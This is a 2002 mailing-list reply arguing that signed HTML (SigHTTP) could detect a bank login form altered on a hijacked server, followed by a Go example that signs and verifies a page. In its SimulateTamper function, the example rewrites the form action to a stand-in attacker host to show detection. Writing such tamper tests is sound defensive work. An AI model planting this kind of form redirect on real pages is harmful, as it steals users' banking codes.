Hi John,

On Friday, 21 June 2002, at 17:00, John Stracke wrote:

>> And at least I think you are too pessimistic by the small number of
>> interested people. I have the impression here in Germany there are still lots
>> of people concerned and frightened every time some TV magazine reports
>> online banking bugs here and security frauds there. If everyone is
>> complaining, how about solving it in a simple way?
>
> But this doesn't solve the actual problem--nearly all cracks of online
> banks, stores, etc., are *not* done by intercepting HTTP traffic.
> They're usually done by exploiting security bugs in the server
> software and stealing information out of the databases. sigHTTP would
> do nothing about that; in fact, it might exacerbate the problem, by
> diverting resources that could instead be spent on securing the
> server.

Here we already had one case where an intruder silently changed the HTML of a
banking portal. He changed the login form in such a way that the one-time
transaction code of the money transfer was sent to him, and he displayed a
successful result himself from the hijacked web server.

The SSL certificate was of no use in this case; it even left the user with
false confidence.

SigHTTP would have been a solution for this case. Changing already signed HTML
content would have deleted or modified the signature, and a SigHTTP-capable
browser or third-party tool would have been given the chance to alert the user.

The "best thing" for sure is a perfectly hardened server, but I think there
must be a second layer of security.

--
Think Safety
www.security-gui.de & www.sighttp.org
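The detection the mail argues for, as an added example that is not SigHTTP's own format or code: the publisher signs the exact bytes of the served HTML with a detached Ed25519 signature, and a client that re-verifies the page notices when the login form has been altered on the compromised server (the page, domain names and signing scheme are constructed here for illustration).

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"encoding/base64"
	"fmt"
	"strings"
)

// Constructed sample page: the login form a banking portal might serve.
const originalPage = `<html><body>
<form action="https://bank.example/login" method="post">
<input name="tan"><input type="submit"></form>
</body></html>`

// NewPublisherKey makes a fresh Ed25519 key pair for the site publisher.
func NewPublisherKey() (ed25519.PublicKey, ed25519.PrivateKey) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	return pub, priv
}

// SignPage returns a detached, base64-encoded signature over the exact
// bytes of the HTML (hypothetical scheme, not the real SigHTTP format).
func SignPage(priv ed25519.PrivateKey, html string) string {
	return base64.StdEncoding.EncodeToString(ed25519.Sign(priv, []byte(html)))
}

// VerifyPage reports whether html is byte-for-byte what the publisher
// signed; a malformed or wrong-length signature is treated as invalid.
func VerifyPage(pub ed25519.PublicKey, html, sigB64 string) bool {
	sig, err := base64.StdEncoding.DecodeString(sigB64)
	if err != nil || len(sig) != ed25519.SignatureSize {
		return false
	}
	return ed25519.Verify(pub, []byte(html), sig)
}

// SimulateTamper reproduces the incident described in the mail for testing:
// the form action on the served page no longer points at the bank.
func SimulateTamper(html string) string {
	return strings.Replace(html, "https://bank.example/login", "https://attacker.example/collect", 1)
}

func main() {
	pub, priv := NewPublisherKey()
	sig := SignPage(priv, originalPage)
	fmt.Println("original verifies:", VerifyPage(pub, originalPage, sig))
	fmt.Println("tampered verifies:", VerifyPage(pub, SimulateTamper(originalPage), sig))
}
```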